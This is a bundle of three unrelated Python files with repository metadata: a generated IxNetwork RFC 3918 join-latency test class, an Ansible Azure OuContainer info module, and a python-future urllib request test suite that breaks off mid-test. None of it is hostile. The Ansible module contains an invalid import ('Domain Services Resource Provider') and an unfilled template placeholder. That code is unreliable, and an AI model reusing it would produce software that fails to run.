] | permissive | iwanb/ixnetwork_restpy | fa8b885ea7a4179048ef2636c37ef7d3f6692e31 | c2cb68fee9f2cc2f86660760e9e07bd06c0013c2 | refs/heads/master | 2021-01-02T17:27:37.096268 | 2020-02-11T09:28:15 | 2020-02-11T09:28:15 | 239,721,780 | 0 | 0 | NOASSERTION | 2020-02-11T09:20:22 | 2020-02-11T09:20:21 | null | UTF-8 | Python | false | false | 14,092 | py | # MIT LICENSE
#
# Copyright 1997 - 2019 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class Rfc3918burdenedJoinDelay(Base):
"""This object allows to configure the attributes for the RFC 3918 Burdened Join Latency test
The Rfc3918burdenedJoinDelay class encapsulates a list of rfc3918burdenedJoinDelay resources that is be managed by the user.
A list of resources can be retrieved from the server using the Rfc3918burdenedJoinDelay.find() method.
The list can be managed by the user by using the Rfc3918burdenedJoinDelay.add() and Rfc3918burdenedJoinDelay.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'rfc3918burdenedJoinDelay'
def __init__(self, parent):
super(Rfc3918burdenedJoinDelay, self).__init__(parent)
@property
def LearnFrames(self):
"""An instance of the LearnFrames class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.quicktest.learnframes_0a7db0b5d733de2a0bf3bed5db16c286.LearnFrames)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.quicktest.learnframes_0a7db0b5d733de2a0bf3bed5db16c286 import LearnFrames
return LearnFrames(self)._select()
@property
def PassCriteria(self):
"""An instance of the PassCriteria class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.quicktest.passcriteria_57842e729b070f362bf9a6926a764ba8.PassCriteria)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.quicktest.passcriteria_57842e729b070f362bf9a6926a764ba8 import PassCriteria
return PassCriteria(self)._select()
@property
def Results(self):
"""An instance of the Results class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.quicktest.results_08701c700127b29bcc67a54b2c1e849d.Results)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.quicktest.results_08701c700127b29bcc67a54b2c1e849d import Results
return Results(self)._select()
@property
def TestConfig(self):
"""An instance of the TestConfig class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.quicktest.testconfig_8d7d791e7ebdee5deea6e96dfd14895c.TestConfig)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.quicktest.testconfig_8d7d791e7ebdee5deea6e96dfd14895c import TestConfig
return TestConfig(self)._select()
@property
def ForceApplyQTConfig(self):
"""Apply QT config
Returns:
bool
"""
return self._get_attribute('forceApplyQTConfig')
@ForceApplyQTConfig.setter
def ForceApplyQTConfig(self, value):
self._set_attribute('forceApplyQTConfig', value)
@property
def InputParameters(self):
"""Input Parameters
Returns:
str
"""
return self._get_attribute('inputParameters')
@InputParameters.setter
def InputParameters(self, value):
self._set_attribute('inputParameters', value)
@property
def Mode(self):
"""Test mode
Returns:
str(existingMode|newMode)
"""
return self._get_attribute('mode')
@Mode.setter
def Mode(self, value):
self._set_attribute('mode', value)
@property
def Name(self):
"""Test name
Returns:
str
"""
return self._get_attribute('name')
@Name.setter
def Name(self, value):
self._set_attribute('name', value)
def update(self, ForceApplyQTConfig=None, InputParameters=None, Mode=None, Name=None):
"""Updates a child instance of rfc3918burdenedJoinDelay on the server.
Args:
ForceApplyQTConfig (bool): Apply QT config
InputParameters (str): Input Parameters
Mode (str(existingMode|newMode)): Test mode
Name (str): Test name
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
self._update(locals())
def add(self, ForceApplyQTConfig=None, InputParameters=None, Mode=None, Name=None):
"""Adds a new rfc3918burdenedJoinDelay node on the server and retrieves it in this instance.
Args:
ForceApplyQTConfig (bool): Apply QT config
InputParameters (str): Input Parameters
Mode (str(existingMode|newMode)): Test mode
Name (str): Test name
Returns:
self: This instance with all currently retrieved rfc3918burdenedJoinDelay data using find and the newly added rfc3918burdenedJoinDelay data available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._create(locals())
def remove(self):
"""Deletes all the rfc3918burdenedJoinDelay data in this instance from server.
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, ForceApplyQTConfig=None, InputParameters=None, Mode=None, Name=None):
"""Finds and retrieves rfc3918burdenedJoinDelay data from the server.
All named parameters support regex and can be used to selectively retrieve rfc3918burdenedJoinDelay data from the server.
By default the find method takes no parameters and will retrieve all rfc3918burdenedJoinDelay data from the server.
Args:
ForceApplyQTConfig (bool): Apply QT config
InputParameters (str): Input Parameters
Mode (str(existingMode|newMode)): Test mode
Name (str): Test name
Returns:
self: This instance with matching rfc3918burdenedJoinDelay data retrieved from the server available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._select(locals())
def read(self, href):
"""Retrieves a single instance of rfc3918burdenedJoinDelay data from the server.
Args:
href (str): An href to the instance to be retrieved
Returns:
self: This instance with the rfc3918burdenedJoinDelay data from the server available through an iterator or index
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def Apply(self):
"""Executes the apply operation on the server.
Applies the specified Quick Test.
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('apply', payload=payload, response_object=None)
def ApplyAsync(self):
"""Executes the applyAsync operation on the server.
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('applyAsync', payload=payload, response_object=None)
def ApplyAsyncResult(self):
"""Executes the applyAsyncResult operation on the server.
Returns:
bool:
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('applyAsyncResult', payload=payload, response_object=None)
def ApplyITWizardConfiguration(self):
"""Executes the applyITWizardConfiguration operation on the server.
Applies the specified Quick Test.
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('applyITWizardConfiguration', payload=payload, response_object=None)
def GenerateReport(self):
"""Executes the generateReport operation on the server.
Generate a PDF report for the last succesfull test run.
Returns:
str: This method is asynchronous and has no return value.
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('generateReport', payload=payload, response_object=None)
def Run(self, *args, **kwargs):
"""Executes the run operation on the server.
Starts the specified Quick Test and waits for its execution to finish.
The IxNetwork modeling infrastructure allows for multiple method Signatures with the same name while python does not.
The following correlates the modeling Signatures to the python *args variable length list:
run()list
Returns:
list(str): This method is synchronous and returns the result of the test.
run(InputParameters:string)list
Args:
args[0] is InputParameters (str): The input arguments of the test.
Returns:
list(str): This method is synchronous and returns the result of the test.
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('run', payload=payload, response_object=None)
def Start(self, *args, **kwargs):
"""Executes the start operation on the server.
Starts the specified Quick Test.
The IxNetwork modeling infrastructure allows for multiple method Signatures with the same name while python does not.
The following correlates the modeling Signatures to the python *args variable length list:
start()
start(InputParameters:string)
Args:
args[0] is InputParameters (str): The input arguments of the test.
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('start', payload=payload, response_object=None)
def Stop(self):
"""Executes the stop operation on the server.
Stops the currently running Quick Test.
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('stop', payload=payload, response_object=None)
def WaitForTest(self):
"""Executes the waitForTest operation on the server.
Waits for the execution of the specified Quick Test to be completed.
Returns:
list(str): This method is synchronous and returns the result of the test.
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('waitForTest', payload=payload, response_object=None)
| [
"srvc_cm_packages@keysight.com"
] | srvc_cm_packages@keysight.com |
6823952645d44cd49647ba4a892a664492f7093b | 02338bb8111fc1aa88e830ac09a11664720eb2d4 | /tmp/azure_rm_oucontainer_info.py | d39f65db9f65e180410688e1d50c78604f5f7fa8 | [] | no_license | Fred-sun/fred_yaml | a49977b0e8505c7447df23dd80c7fef1be70e6bc | 295ca4cd2b59b8d2758f06eb7fd79920327ea524 | refs/heads/master | 2023-04-28T05:51:56.599488 | 2023-04-25T13:52:10 | 2023-04-25T13:52:10 | 131,376,340 | 0 | 1 | null | 2020-07-06T14:22:46 | 2018-04-28T05:34:49 | TSQL | UTF-8 | Python | false | false | 9,484 | py | #!/usr/bin/python
#
# Copyright (c) 2020 GuopengLin, (@t-glin)
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_oucontainer_info
version_added: '2.9'
short_description: Get OuContainer info.
description:
- Get info of OuContainer.
options:
resource_group_name:
description:
- >-
The name of the resource group within the user's subscription. The name
is case insensitive.
required: true
type: str
domain_service_name:
description:
- The name of the domain service.
required: true
type: str
ou_container_name:
description:
- The name of the OuContainer.
type: str
extends_documentation_fragment:
- azure
author:
- GuopengLin (@t-glin)
'''
EXAMPLES = '''
- name: List of OuContainers
azure_rm_oucontainer_info:
domain_service_name: OuContainer.com
resource_group_name: OuContainerResourceGroup
'''
RETURN = '''
ou_container:
description: >-
A list of dict results where the key is the name of the OuContainer and the
values are the facts for that OuContainer.
returned: always
type: complex
contains:
value:
description:
- The list of OuContainer.
returned: always
type: list
sample: null
contains:
tenant_id:
description:
- Azure Active Directory tenant id
returned: always
type: str
sample: null
domain_name:
description:
- The domain name of Domain Services.
returned: always
type: str
sample: null
deployment_id:
description:
- The Deployment id
returned: always
type: str
sample: null
container_id:
description:
- The OuContainer name
returned: always
type: str
sample: null
accounts:
description:
- The list of container accounts
returned: always
type: list
sample: null
contains:
account_name:
description:
- The account name
returned: always
type: str
sample: null
spn:
description:
- The account spn
returned: always
type: str
sample: null
password:
description:
- The account password
returned: always
type: str
sample: null
service_status:
description:
- Status of OuContainer instance
returned: always
type: str
sample: null
provisioning_state:
description:
- >-
The current deployment or provisioning state, which only appears
in the response.
returned: always
type: str
sample: null
next_link:
description:
- The continuation token for the next page of results.
returned: always
type: str
sample: null
id:
description:
- Resource Id
returned: always
type: str
sample: null
name:
description:
- Resource name
returned: always
type: str
sample: null
type:
description:
- Resource type
returned: always
type: str
sample: null
location:
description:
- Resource location
returned: always
type: str
sample: null
tags:
description:
- Resource tags
returned: always
type: dictionary
sample: null
etag:
description:
- Resource etag
returned: always
type: str
sample: null
tenant_id:
description:
- Azure Active Directory tenant id
returned: always
type: str
sample: null
domain_name:
description:
- The domain name of Domain Services.
returned: always
type: str
sample: null
deployment_id:
description:
- The Deployment id
returned: always
type: str
sample: null
container_id:
description:
- The OuContainer name
returned: always
type: str
sample: null
accounts:
description:
- The list of container accounts
returned: always
type: list
sample: null
contains:
account_name:
description:
- The account name
returned: always
type: str
sample: null
spn:
description:
- The account spn
returned: always
type: str
sample: null
password:
description:
- The account password
returned: always
type: str
sample: null
service_status:
description:
- Status of OuContainer instance
returned: always
type: str
sample: null
provisioning_state:
description:
- >-
The current deployment or provisioning state, which only appears in
the response.
returned: always
type: str
sample: null
'''
import time
import json
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
from copy import deepcopy
try:
from msrestazure.azure_exceptions import CloudError
from azure.mgmt.domain import Domain Services Resource Provider
from msrestazure.azure_operation import AzureOperationPoller
from msrest.polling import LROPoller
except ImportError:
# This is handled in azure_rm_common
pass
class AzureRMOuContainerInfo(AzureRMModuleBase):
def __init__(self):
self.module_arg_spec = dict(
resource_group_name=dict(
type='str',
required=True
),
domain_service_name=dict(
type='str',
required=True
),
ou_container_name=dict(
type='str'
)
)
self.resource_group_name = None
self.domain_service_name = None
self.ou_container_name = None
self.results = dict(changed=False)
self.mgmt_client = None
self.state = None
self.url = None
self.status_code = [200]
self.query_parameters = {}
self.query_parameters['api-version'] = '2017-06-01'
self.header_parameters = {}
self.header_parameters['Content-Type'] = 'application/json; charset=utf-8'
self.mgmt_client = None
super(AzureRMOuContainerInfo, self).__init__(self.module_arg_spec, supports_tags=True)
def exec_module(self, **kwargs):
for key in self.module_arg_spec:
setattr(self, key, kwargs[key])
self.mgmt_client = self.get_mgmt_svc_client(Domain Services Resource Provider,
base_url=self._cloud_environment.endpoints.resource_manager,
api_version='2017-06-01')
if (self.resource_group_name is not None and
self.domain_service_name is not None and
self.ou_container_name is not None):
self.results['ou_container'] = self.format_item(self.get())
elif (self.resource_group_name is not None and
self.domain_service_name is not None):
self.results['ou_container'] = self.format_item(self.list())
return self.results
def get(self):
response = None
try:
response = self.mgmt_client.ou_container.get(resource_group_name=self.resource_group_name,
domain_service_name=self.domain_service_name,
ou_container_name=self.ou_container_name)
except CloudError as e:
self.log('Could not get info for @(Model.ModuleOperationNameUpper).')
return response
def list(self):
response = None
try:
response = self.mgmt_client.ou_container.list(resource_group_name=self.resource_group_name,
domain_service_name=self.domain_service_name)
except CloudError as e:
self.log('Could not get info for @(Model.ModuleOperationNameUpper).')
return response
def format_item(self, item):
if hasattr(item, 'as_dict'):
return [item.as_dict()]
else:
result = []
items = list(item)
for tmp in items:
result.append(tmp.as_dict())
return result
def main():
AzureRMOuContainerInfo()
if __name__ == '__main__':
main()
| [
"xiuxi.sun@qq.com"
] | xiuxi.sun@qq.com |
40eb3f09a39462ee8a0cc6338183621cd135cd2d | 7a2bf793ae78a6fbb9081d5117a4273c9a45381f | /future/tests/test_urllib2.py | a5a1167fc00222cbfdb0394f959021cc5ee82f4d | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | frewsxcv/python-future | 410ba3d62180797d4d6afe5f7a9d5d0371a747f3 | 2bb5f0215d9ba89649de6bed55537aefab92c9a7 | refs/heads/master | 2020-12-30T18:30:17.286782 | 2014-06-18T05:25:17 | 2014-06-18T05:25:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 62,630 | py | from __future__ import absolute_import, division, unicode_literals
import os
import io
import socket
import array
import sys
from future.standard_library import import_, install_aliases
from future.backports.test import support
import future.backports.urllib.request as urllib_request
# The proxy bypass method imported below has logic specific to the OSX
# proxy config data structure but is testable on all platforms.
from future.backports.urllib.request import Request, OpenerDirector, _proxy_bypass_macosx_sysconf
import future.backports.urllib.error as urllib_error
from future.tests.base import unittest
from future.builtins import bytes, dict, int, open, str, zip
from future.utils import text_to_native_str
install_aliases() # for base64.encodebytes on Py2
# XXX
# Request
# CacheFTPHandler (hard to write)
# parse_keqv_list, parse_http_list, HTTPDigestAuthHandler
class TrivialTests(unittest.TestCase):
def test___all__(self):
# Verify which names are exposed
for module in 'request', 'response', 'parse', 'error', 'robotparser':
context = {}
exec('from future.backports.urllib.%s import *' % module, context)
del context['__builtins__']
if module == 'request' and os.name == 'nt':
u, p = context.pop('url2pathname'), context.pop('pathname2url')
self.assertEqual(u.__module__, 'nturl2path')
self.assertEqual(p.__module__, 'nturl2path')
for k, v in context.items():
self.assertEqual(v.__module__, 'future.backports.urllib.%s' % module,
"%r is exposed in 'future.backports.urllib.%s' but defined in %r" %
(k, module, v.__module__))
def test_trivial(self):
# A couple trivial tests
self.assertRaises(ValueError, urllib_request.urlopen, 'bogus url')
# XXX Name hacking to get this to work on Windows.
fname = os.path.abspath(urllib_request.__file__).replace('\\', '/')
if os.name == 'nt':
file_url = "file:///%s" % fname
else:
file_url = "file://%s" % fname
f = urllib_request.urlopen(file_url)
f.read()
f.close()
def test_parse_http_list(self):
tests = [
('a,b,c', ['a', 'b', 'c']),
('path"o,l"og"i"cal, example', ['path"o,l"og"i"cal', 'example']),
('a, b, "c", "d", "e,f", g, h',
['a', 'b', '"c"', '"d"', '"e,f"', 'g', 'h']),
('a="b\\"c", d="e\\,f", g="h\\\\i"',
['a="b"c"', 'd="e,f"', 'g="h\\i"'])]
for string, list in tests:
self.assertEqual(urllib_request.parse_http_list(string), list)
def test_URLError_reasonstr(self):
err = urllib_error.URLError('reason')
self.assertIn(err.reason, str(err))
class RequestHdrsTests(unittest.TestCase):
def test_request_headers_dict(self):
"""
The Request.headers dictionary is not a documented interface. It
should stay that way, because the complete set of headers are only
accessible through the .get_header(), .has_header(), .header_items()
interface. However, .headers pre-dates those methods, and so real code
will be using the dictionary.
The introduction in 2.4 of those methods was a mistake for the same
reason: code that previously saw all (urllib2 user)-provided headers in
.headers now sees only a subset.
"""
url = "http://example.com"
self.assertEqual(Request(url,
headers={"Spam-eggs": "blah"}
).headers["Spam-eggs"], "blah")
self.assertEqual(Request(url,
headers={"spam-EggS": "blah"}
).headers["Spam-eggs"], "blah")
def test_request_headers_methods(self):
"""
Note the case normalization of header names here, to
.capitalize()-case. This should be preserved for
backwards-compatibility. (In the HTTP case, normalization to
.title()-case is done by urllib2 before sending headers to
http.client).
Note that e.g. r.has_header("spam-EggS") is currently False, and
r.get_header("spam-EggS") returns None, but that could be changed in
future.
Method r.remove_header should remove items both from r.headers and
r.unredirected_hdrs dictionaries
"""
url = "http://example.com"
req = Request(url, headers={"Spam-eggs": "blah"})
self.assertTrue(req.has_header("Spam-eggs"))
self.assertEqual(req.header_items(), [('Spam-eggs', 'blah')])
req.add_header("Foo-Bar", "baz")
self.assertEqual(sorted(req.header_items()),
[('Foo-bar', 'baz'), ('Spam-eggs', 'blah')])
self.assertFalse(req.has_header("Not-there"))
self.assertIsNone(req.get_header("Not-there"))
self.assertEqual(req.get_header("Not-there", "default"), "default")
def test_password_manager(self):
mgr = urllib_request.HTTPPasswordMgr()
add = mgr.add_password
find_user_pass = mgr.find_user_password
add("Some Realm", "http://example.com/", "joe", "password")
add("Some Realm", "http://example.com/ni", "ni", "ni")
add("c", "http://example.com/foo", "foo", "ni")
add("c", "http://example.com/bar", "bar", "nini")
add("b", "http://example.com/", "first", "blah")
add("b", "http://example.com/", "second", "spam")
add("a", "http://example.com", "1", "a")
add("Some Realm", "http://c.example.com:3128", "3", "c")
add("Some Realm", "d.example.com", "4", "d")
add("Some Realm", "e.example.com:3128", "5", "e")
self.assertEqual(find_user_pass("Some Realm", "example.com"),
('joe', 'password'))
#self.assertEqual(find_user_pass("Some Realm", "http://example.com/ni"),
# ('ni', 'ni'))
self.assertEqual(find_user_pass("Some Realm", "http://example.com"),
('joe', 'password'))
self.assertEqual(find_user_pass("Some Realm", "http://example.com/"),
('joe', 'password'))
self.assertEqual(
find_user_pass("Some Realm", "http://example.com/spam"),
('joe', 'password'))
self.assertEqual(
find_user_pass("Some Realm", "http://example.com/spam/spam"),
('joe', 'password'))
self.assertEqual(find_user_pass("c", "http://example.com/foo"),
('foo', 'ni'))
self.assertEqual(find_user_pass("c", "http://example.com/bar"),
('bar', 'nini'))
self.assertEqual(find_user_pass("b", "http://example.com/"),
('second', 'spam'))
# No special relationship between a.example.com and example.com:
self.assertEqual(find_user_pass("a", "http://example.com/"),
('1', 'a'))
self.assertEqual(find_user_pass("a", "http://a.example.com/"),
(None, None))
# Ports:
self.assertEqual(find_user_pass("Some Realm", "c.example.com"),
(None, None))
self.assertEqual(find_user_pass("Some Realm", "c.example.com:3128"),
('3', 'c'))
self.assertEqual(
find_user_pass("Some Realm", "http://c.example.com:3128"),
('3', 'c'))
self.assertEqual(find_user_pass("Some Realm", "d.example.com"),
('4', 'd'))
self.assertEqual(find_user_pass("Some Realm", "e.example.com:3128"),
('5', 'e'))
def test_password_manager_default_port(self):
"""
The point to note here is that we can't guess the default port if
there's no scheme. This applies to both add_password and
find_user_password.
"""
mgr = urllib_request.HTTPPasswordMgr()
add = mgr.add_password
find_user_pass = mgr.find_user_password
add("f", "http://g.example.com:80", "10", "j")
add("g", "http://h.example.com", "11", "k")
add("h", "i.example.com:80", "12", "l")
add("i", "j.example.com", "13", "m")
self.assertEqual(find_user_pass("f", "g.example.com:100"),
(None, None))
self.assertEqual(find_user_pass("f", "g.example.com:80"),
('10', 'j'))
self.assertEqual(find_user_pass("f", "g.example.com"),
(None, None))
self.assertEqual(find_user_pass("f", "http://g.example.com:100"),
(None, None))
self.assertEqual(find_user_pass("f", "http://g.example.com:80"),
('10', 'j'))
self.assertEqual(find_user_pass("f", "http://g.example.com"),
('10', 'j'))
self.assertEqual(find_user_pass("g", "h.example.com"), ('11', 'k'))
self.assertEqual(find_user_pass("g", "h.example.com:80"), ('11', 'k'))
self.assertEqual(find_user_pass("g", "http://h.example.com:80"),
('11', 'k'))
self.assertEqual(find_user_pass("h", "i.example.com"), (None, None))
self.assertEqual(find_user_pass("h", "i.example.com:80"), ('12', 'l'))
self.assertEqual(find_user_pass("h", "http://i.example.com:80"),
('12', 'l'))
self.assertEqual(find_user_pass("i", "j.example.com"), ('13', 'm'))
self.assertEqual(find_user_pass("i", "j.example.com:80"),
(None, None))
self.assertEqual(find_user_pass("i", "http://j.example.com"),
('13', 'm'))
self.assertEqual(find_user_pass("i", "http://j.example.com:80"),
(None, None))
class MockOpener(object):
addheaders = []
def open(self, req, data=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
self.req, self.data, self.timeout = req, data, timeout
def error(self, proto, *args):
self.proto, self.args = proto, args
class MockFile(object):
def read(self, count=None): pass
def readline(self, count=None): pass
def close(self): pass
class MockHeaders(dict):
def getheaders(self, name):
return list(self.values())
class MockResponse(io.StringIO):
def __init__(self, code, msg, headers, data, url=None):
io.StringIO.__init__(self, data)
self.code, self.msg, self.headers, self.url = code, msg, headers, url
def info(self):
return self.headers
def geturl(self):
return self.url
class MockCookieJar(object):
def add_cookie_header(self, request):
self.ach_req = request
def extract_cookies(self, response, request):
self.ec_req, self.ec_r = request, response
class FakeMethod(object):
def __init__(self, meth_name, action, handle):
self.meth_name = meth_name
self.handle = handle
self.action = action
def __call__(self, *args):
return self.handle(self.meth_name, self.action, *args)
class MockHTTPResponse(io.IOBase):
def __init__(self, fp, msg, status, reason):
self.fp = fp
self.msg = msg
self.status = status
self.reason = reason
self.code = 200
def read(self):
return ''
def info(self):
return {}
def geturl(self):
return self.url
class MockHTTPClass(object):
def __init__(self):
self.level = 0
self.req_headers = []
self.data = None
self.raise_on_endheaders = False
self.sock = None
self._tunnel_headers = {}
def __call__(self, host, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
self.host = host
self.timeout = timeout
return self
def set_debuglevel(self, level):
self.level = level
def set_tunnel(self, host, port=None, headers=None):
self._tunnel_host = host
self._tunnel_port = port
if headers:
self._tunnel_headers = headers
else:
self._tunnel_headers.clear()
def request(self, method, url, body=None, headers=None):
self.method = method
self.selector = url
if headers is not None:
self.req_headers += headers.items()
self.req_headers.sort()
if body:
self.data = body
if self.raise_on_endheaders:
import socket
raise socket.error()
def getresponse(self):
return MockHTTPResponse(MockFile(), {}, 200, "OK")
def close(self):
pass
class MockHandler(object):
# useful for testing handler machinery
# see add_ordered_mock_handlers() docstring
handler_order = 500
def __init__(self, methods):
self._define_methods(methods)
def _define_methods(self, methods):
for spec in methods:
if len(spec) == 2: name, action = spec
else: name, action = spec, None
meth = FakeMethod(name, action, self.handle)
setattr(self.__class__, name, meth)
def handle(self, fn_name, action, *args, **kwds):
self.parent.calls.append((self, fn_name, args, kwds))
if action is None:
return None
elif action == "return self":
return self
elif action == "return response":
res = MockResponse(200, "OK", {}, "")
return res
elif action == "return request":
return Request("http://blah/")
elif action.startswith("error"):
code = action[action.rfind(" ")+1:]
try:
code = int(code)
except ValueError:
pass
res = MockResponse(200, "OK", {}, "")
return self.parent.error("http", args[0], res, code, "", {})
elif action == "raise":
raise urllib_error.URLError("blah")
assert False
def close(self): pass
def add_parent(self, parent):
self.parent = parent
self.parent.calls = []
def __lt__(self, other):
if not hasattr(other, "handler_order"):
# No handler_order, leave in original order. Yuck.
return True
return self.handler_order < other.handler_order
def add_ordered_mock_handlers(opener, meth_spec):
"""Create MockHandlers and add them to an OpenerDirector.
meth_spec: list of lists of tuples and strings defining methods to define
on handlers. eg:
[["http_error", "ftp_open"], ["http_open"]]
defines methods .http_error() and .ftp_open() on one handler, and
.http_open() on another. These methods just record their arguments and
return None. Using a tuple instead of a string causes the method to
perform some action (see MockHandler.handle()), eg:
[["http_error"], [("http_open", "return request")]]
defines .http_error() on one handler (which simply returns None), and
.http_open() on another handler, which returns a Request object.
"""
handlers = []
count = 0
for meths in meth_spec:
class MockHandlerSubclass(MockHandler): pass
h = MockHandlerSubclass(meths)
h.handler_order += count
h.add_parent(opener)
count = count + 1
handlers.append(h)
opener.add_handler(h)
return handlers
def build_test_opener(*handler_instances):
opener = OpenerDirector()
for h in handler_instances:
opener.add_handler(h)
return opener
class MockHTTPHandler(urllib_request.BaseHandler):
# useful for testing redirections and auth
# sends supplied headers and code as first response
# sends 200 OK as second response
def __init__(self, code, headers):
self.code = code
self.headers = headers
self.reset()
def reset(self):
self._count = 0
self.requests = []
def http_open(self, req):
import future.backports.email as email
from future import standard_library
http = import_('http.client', backport=True)
import copy
self.requests.append(copy.deepcopy(req))
if self._count == 0:
self._count = self._count + 1
name = http.client.responses[self.code]
msg = email.message_from_string(self.headers)
return self.parent.error(
"http", req, MockFile(), self.code, name, msg)
else:
self.req = req
msg = email.message_from_string("\r\n\r\n")
return MockResponse(200, "OK", msg, "", req.get_full_url())
class MockHTTPSHandler(urllib_request.AbstractHTTPHandler):
# Useful for testing the Proxy-Authorization request by verifying the
# properties of httpcon
def __init__(self):
urllib_request.AbstractHTTPHandler.__init__(self)
self.httpconn = MockHTTPClass()
def https_open(self, req):
return self.do_open(self.httpconn, req)
class MockPasswordManager(object):
def add_password(self, realm, uri, user, password):
self.realm = realm
self.url = uri
self.user = user
self.password = password
def find_user_password(self, realm, authuri):
self.target_realm = realm
self.target_url = authuri
return self.user, self.password
class OpenerDirectorTests(unittest.TestCase):
def test_add_non_handler(self):
class NonHandler(object):
pass
self.assertRaises(TypeError,
OpenerDirector().add_handler, NonHandler())
def test_badly_named_methods(self):
# test work-around for three methods that accidentally follow the
# naming conventions for handler methods
# (*_open() / *_request() / *_response())
# These used to call the accidentally-named methods, causing a
# TypeError in real code; here, returning self from these mock
# methods would either cause no exception, or AttributeError.
from future.backports.urllib.error import URLError
o = OpenerDirector()
meth_spec = [
[("do_open", "return self"), ("proxy_open", "return self")],
[("redirect_request", "return self")],
]
add_ordered_mock_handlers(o, meth_spec)
o.add_handler(urllib_request.UnknownHandler())
for scheme in "do", "proxy", "redirect":
self.assertRaises(URLError, o.open, scheme+"://example.com/")
def test_handled(self):
# handler returning non-None means no more handlers will be called
o = OpenerDirector()
meth_spec = [
["http_open", "ftp_open", "http_error_302"],
["ftp_open"],
[("http_open", "return self")],
[("http_open", "return self")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("http://example.com/")
r = o.open(req)
# Second .http_open() gets called, third doesn't, since second returned
# non-None. Handlers without .http_open() never get any methods called
# on them.
# In fact, second mock handler defining .http_open() returns self
# (instead of response), which becomes the OpenerDirector's return
# value.
self.assertEqual(r, handlers[2])
calls = [(handlers[0], "http_open"), (handlers[2], "http_open")]
for expected, got in zip(calls, o.calls):
handler, name, args, kwds = got
self.assertEqual((handler, name), expected)
self.assertEqual(args, (req,))
def test_handler_order(self):
o = OpenerDirector()
handlers = []
for meths, handler_order in [
([("http_open", "return self")], 500),
(["http_open"], 0),
]:
class MockHandlerSubclass(MockHandler): pass
h = MockHandlerSubclass(meths)
h.handler_order = handler_order
handlers.append(h)
o.add_handler(h)
o.open("http://example.com/")
# handlers called in reverse order, thanks to their sort order
self.assertEqual(o.calls[0][0], handlers[1])
self.assertEqual(o.calls[1][0], handlers[0])
def test_raise(self):
# raising URLError stops processing of request
o = OpenerDirector()
